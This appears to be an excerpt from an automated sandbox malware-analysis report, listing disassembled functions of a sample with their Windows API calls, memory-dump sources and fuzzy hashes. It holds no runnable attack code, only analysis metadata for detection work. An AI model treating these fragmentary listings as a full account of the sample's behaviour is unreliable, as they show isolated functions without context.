            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$Delete$InfoItem
            • String ID: 0
            • API String ID: 135850232-4108050209
            • Opcode ID: 0869e83d5b16211a7138f291fa179ffa3a77cf212edc45b26e43cf6db9461bb4
            • Instruction ID: 70db6e8a86213ebb0c0e4072f0997c0c56d99e869b2aeed37eb9898f340347cf
            • Opcode Fuzzy Hash: 0869e83d5b16211a7138f291fa179ffa3a77cf212edc45b26e43cf6db9461bb4
            • Instruction Fuzzy Hash: 0C41A2712043029FF721DF28D984B5ABBE8AF85310F00879EF9E5972D1D774A604CB62
            Function 01034416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
            Download Yara Rule
            APIs
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0103CC08,00000000,?,?,?,?), ref: 010344AA
            • GetWindowLongW.USER32 ref: 010344C7
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 010344D7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Long
            • String ID: SysTreeView32
            • API String ID: 847901565-1698111956
            • Opcode ID: d294de2be430d0970432461990a31037bcbe1e081929a4064d5841b1b46bcb52
            • Instruction ID: d95b635504537846ccccd8eddac81fc7d75a5be096cf520342b995a4a60366af
            • Opcode Fuzzy Hash: d294de2be430d0970432461990a31037bcbe1e081929a4064d5841b1b46bcb52
            • Instruction Fuzzy Hash: D331DE32200205AFEB618E38DC45BEA7BADEB89334F204725F9B5E61D1DB74E8509B50
            Function 0102304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0102335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01023077,?,?), ref: 01023378
            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0102307A
            • _wcslen.LIBCMT ref: 0102309B
            • htons.WSOCK32(00000000,?,?,00000000), ref: 01023106
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
            • String ID: 255.255.255.255
            • API String ID: 946324512-2422070025
            • Opcode ID: cecf4d1e4e73c70a7b70bcd5c79d04426b9f3bcab62272a647b202c2183b1180
            • Instruction ID: 7415798ae83e1a58ac3213b4230287de18dddbd34bc5e1e84c9402d3f8488a8e
            • Opcode Fuzzy Hash: cecf4d1e4e73c70a7b70bcd5c79d04426b9f3bcab62272a647b202c2183b1180
            • Instruction Fuzzy Hash: 1E31C1352042219FD720CF68C595EAA7BF0FF18318F248499E9958F392CB7AEA41C760
            Function 01034653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01034705
            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01034713
            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0103471A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$DestroyWindow
            • String ID: msctls_updown32
            • API String ID: 4014797782-2298589950
            • Opcode ID: c61a08c860f9c7870a428c166f2b9fa3a6ed745d32a99e41e0a6fc808fb44b98
            • Instruction ID: 896a234df2a97583cff37f8e65ca031502b3a3392cf243ece8b7264bf4c3bd1d
            • Opcode Fuzzy Hash: c61a08c860f9c7870a428c166f2b9fa3a6ed745d32a99e41e0a6fc808fb44b98
            • Instruction Fuzzy Hash: 302160B5600209AFEB11DF68DCC1DA737EDEB8A394B040459FA40DB291C775EC11DB60
            Function 010095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen
            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
            • API String ID: 176396367-2734436370
            • Opcode ID: 73dfe255641543bedde7653c4009d1c80f676fb578470e6cc9452e5d8f5d852f
            • Instruction ID: eb52461fb89baccb8fc81c9f55b00c43835ca6d1913a4cc5ed01b74e00a3f059
            • Opcode Fuzzy Hash: 73dfe255641543bedde7653c4009d1c80f676fb578470e6cc9452e5d8f5d852f
            • Instruction Fuzzy Hash: A6213B7210461166F332BA299C02FBB77DC9F95304F004029F9CD97183EB559941D395
            Function 010337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01033840
            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01033850
            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01033876
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$MoveWindow
            • String ID: Listbox
            • API String ID: 3315199576-2633736733
            • Opcode ID: 9046c4b323501fc59e3fa40af42b63726de08b25dad3b32a577fc6b747a8932d
            • Instruction ID: 554c7124fb10bd378e8fc7a2f32fbb69c30361d7abde331b7a827a064f850937
            • Opcode Fuzzy Hash: 9046c4b323501fc59e3fa40af42b63726de08b25dad3b32a577fc6b747a8932d
            • Instruction Fuzzy Hash: 6B21B072610218BBEB228F58CC85EAB37AEFFC9750F108154F9809B190C676DC5287A0
            Function 010149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 01014A08
            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 01014A5C
            • SetErrorMode.KERNEL32(00000000,?,?,0103CC08), ref: 01014AD0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$InformationVolume
            • String ID: %lu
            • API String ID: 2507767853-685833217
            • Opcode ID: c5099aad1a06ef906499a7fbd10dfd3d10345b0b780beaf8def189c9a404f1d5
            • Instruction ID: d50830b823c0c92269e835bb65a68851a9829d5f427a57601571c3145ecc4a88
            • Opcode Fuzzy Hash: c5099aad1a06ef906499a7fbd10dfd3d10345b0b780beaf8def189c9a404f1d5
            • Instruction Fuzzy Hash: 71319171A00109AFDB10DF54C980EAE7BF8EF09308F1480A9F949EB252D775EE45DB61
            Function 010341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0103424F
            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01034264
            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01034271
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: msctls_trackbar32
            • API String ID: 3850602802-1010561917
            • Opcode ID: 5fe984e0b5f4c80d579dd9bfa144694740266a7e4364298d4becf9a4d6a20b3f
            • Instruction ID: 2b12449aec5c9286f062c933ced312ac377c951f3c30950221275d88edca50ec
            • Opcode Fuzzy Hash: 5fe984e0b5f4c80d579dd9bfa144694740266a7e4364298d4becf9a4d6a20b3f
            • Instruction Fuzzy Hash: 9F11C671240248BFEF215E69CC06FAB3BACEFC5B54F014515FA95F6090D271D8519B10
            Function 01002F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
              • Part of subcall function 01002DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01002DC5
              • Part of subcall function 01002DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 01002DD6
              • Part of subcall function 01002DA7: GetCurrentThreadId.KERNEL32 ref: 01002DDD
              • Part of subcall function 01002DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01002DE4
            • GetFocus.USER32 ref: 01002F78
              • Part of subcall function 01002DEE: GetParent.USER32(00000000), ref: 01002DF9
            • GetClassNameW.USER32(?,?,00000100), ref: 01002FC3
            • EnumChildWindows.USER32(?,0100303B), ref: 01002FEB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
            • String ID: %s%d
            • API String ID: 1272988791-1110647743
            • Opcode ID: a2b6f83d110c7c3754d56fe2ef150da60fe867f064268590ce14cbe6dda5c512
            • Instruction ID: c04d58a208eac35a6d5afe8dc6bc51d3b936b8e8c14a3494b7695081a72aed69
            • Opcode Fuzzy Hash: a2b6f83d110c7c3754d56fe2ef150da60fe867f064268590ce14cbe6dda5c512
            • Instruction Fuzzy Hash: 8711D271200205ABEF12BF648D99EEE776EAF94304F04407AF949EB182DE3499099B70
            Function 01035882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010358C1
            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010358EE
            • DrawMenuBar.USER32(?), ref: 010358FD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$InfoItem$Draw
            • String ID: 0
            • API String ID: 3227129158-4108050209
            • Opcode ID: 957ce94254dfa433756a9ecd24d8b0274cf6c3482a6a2cd3257b588f873267b8
            • Instruction ID: 21c69ec5f9aa1cf64d53adefb9bc2996c49f703bb8e8505b3bf01d5a210d5180
            • Opcode Fuzzy Hash: 957ce94254dfa433756a9ecd24d8b0274cf6c3482a6a2cd3257b588f873267b8
            • Instruction Fuzzy Hash: E1018031500218AFEB619F15DC44BEFBBB8FF85360F00809AE889D61A1DB348A94DF31
            Function 0100007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 72511a269a1d36346b9a3512e4026d0c723e1b121d45f4694f973e076883a39d
            • Instruction ID: 255efd8e3bd28682d48211f7105155dec9c0e6bba0f946c2515741337241f3a4
            • Opcode Fuzzy Hash: 72511a269a1d36346b9a3512e4026d0c723e1b121d45f4694f973e076883a39d
            • Instruction Fuzzy Hash: BEC14A75A0020AAFEB16CF98C894BAEB7B9FF48344F108598F545EB295D731DE41CB90
            Function 0102342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearInitInitializeUninitialize
            • String ID:
            • API String ID: 1998397398-0
            • Opcode ID: a924ddbe92e56429540dc080de01e9e8246dca7a4138c85f2dda4cd7cb380dc0
            • Instruction ID: f3534d23f7db00bdd0ea2bc7907dd61e255c8399f591a478c526945c76d996a8
            • Opcode Fuzzy Hash: a924ddbe92e56429540dc080de01e9e8246dca7a4138c85f2dda4cd7cb380dc0
            • Instruction Fuzzy Hash: 77A15C756043109FD710EF28C885A2AB7E9FF8D710F088859F98A9B365DB38ED01CB91
            Function 01000436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
            Download Yara Rule
            APIs
            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0103FC08,?), ref: 010005F0
            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0103FC08,?), ref: 01000608
            • CLSIDFromProgID.OLE32(?,?,00000000,0103CC40,000000FF,?,00000000,00000800,00000000,?,0103FC08,?), ref: 0100062D
            • _memcmp.LIBVCRUNTIME ref: 0100064E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FromProg$FreeTask_memcmp
            • String ID:
            • API String ID: 314563124-0
            • Opcode ID: 27d51de1c16616d267c2cdb9a1babf9e99dabe216d5b08f060f725372a6590fa
            • Instruction ID: 804b28952f6b485b4c1ddda476ab9a9a7c9ebbe9ccbd8dc3ec32c21a2cb072fd
            • Opcode Fuzzy Hash: 27d51de1c16616d267c2cdb9a1babf9e99dabe216d5b08f060f725372a6590fa
            • Instruction Fuzzy Hash: 4B813D71A00109EFDB05DF98C984EEEB7B9FF89315F204198F546AB254DB71AE06CB60
            Function 00FE1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free
            • String ID:
            • API String ID: 269201875-0
            • Opcode ID: 476be5d8ef7032c1700eb763bfc3eee7ec627f295c10d7ed9b016606b0913ec1
            • Instruction ID: cdab36293793a74f60d7004bf94c9e493a9a5209fa3677c381b494e32fcff938
            • Opcode Fuzzy Hash: 476be5d8ef7032c1700eb763bfc3eee7ec627f295c10d7ed9b016606b0913ec1
            • Instruction Fuzzy Hash: 5F412031A005515BDB25EBFB8C46BBE3AA5FF43370F184226F415D63D1E6784841B272
            Function 01036278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
            Download Yara Rule
            APIs
            • GetWindowRect.USER32(011EF918,?), ref: 010362E2
            • ScreenToClient.USER32(?,?), ref: 01036315
            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01036382
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ClientMoveRectScreen
            • String ID:
            • API String ID: 3880355969-0
            • Opcode ID: b1170bb5818534e9ef4596c31f77a4427ddf64a99fe841b68973c67eeaa28598
            • Instruction ID: 4770cc8532b4024f24fe26f409546f76bf548af2f60ae694d2360c5a96118731
            • Opcode Fuzzy Hash: b1170bb5818534e9ef4596c31f77a4427ddf64a99fe841b68973c67eeaa28598
            • Instruction Fuzzy Hash: FE516E75900209EFDF21DF58D8809AE7BF9FF85360F108199F9A59B291D732EA41CB50
            Function 01021AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
            Download Yara Rule
            APIs
            • socket.WSOCK32(00000002,00000002,00000011), ref: 01021AFD
            • WSAGetLastError.WSOCK32 ref: 01021B0B
            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01021B8A
            • WSAGetLastError.WSOCK32 ref: 01021B94
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$socket
            • String ID:
            • API String ID: 1881357543-0
            • Opcode ID: 847026de9036cd9f8755d35cef04b1fcb68d86dc7478ff41ff79a67341d8df11
            • Instruction ID: da60d39cb886c1586852ebd511ca37182bea0bcfcc664a58e9371579f068844b
            • Opcode Fuzzy Hash: 847026de9036cd9f8755d35cef04b1fcb68d86dc7478ff41ff79a67341d8df11
            • Instruction Fuzzy Hash: 0041D074600210AFE721AF24C886F2A77E5AF45718F588488FA5A9F3C3D776ED418B90
            Function 00FDB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c514becb349032d76e82c56000b5e6e555c235316f9005fff2d8381864c702e1
            • Instruction ID: fa085ff5739ff0c54dab62bc83be10d2de4494a591643c4c8c28ad960b867ef1
            • Opcode Fuzzy Hash: c514becb349032d76e82c56000b5e6e555c235316f9005fff2d8381864c702e1
            • Instruction Fuzzy Hash: 8541F776A00344EFD724DF38CC41BAABBAAEB89720F15462FF141DB381D775A901A790
            Function 010156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
            Download Yara Rule
            APIs
            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 01015783
            • GetLastError.KERNEL32(?,00000000), ref: 010157A9
            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 010157CE
            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 010157FA
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateHardLink$DeleteErrorFileLast
            • String ID:
            • API String ID: 3321077145-0
            • Opcode ID: cbc77f8d0710385ba2468350ac6d7c4cd3004f8db0d758ca498ab08f9cc0dae7
            • Instruction ID: abcf5cce9cf0ca7c62f3b95cf64f2f304b6112e2872cfbf7c10f2790005dd9b7
            • Opcode Fuzzy Hash: cbc77f8d0710385ba2468350ac6d7c4cd3004f8db0d758ca498ab08f9cc0dae7
            • Instruction Fuzzy Hash: 52410C75600610DFCB11EF15C945A5DBBE2AF8A320B198488EC4AAF366CB39FD41DB91
            Function 00FDD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
            Download Yara Rule
            APIs
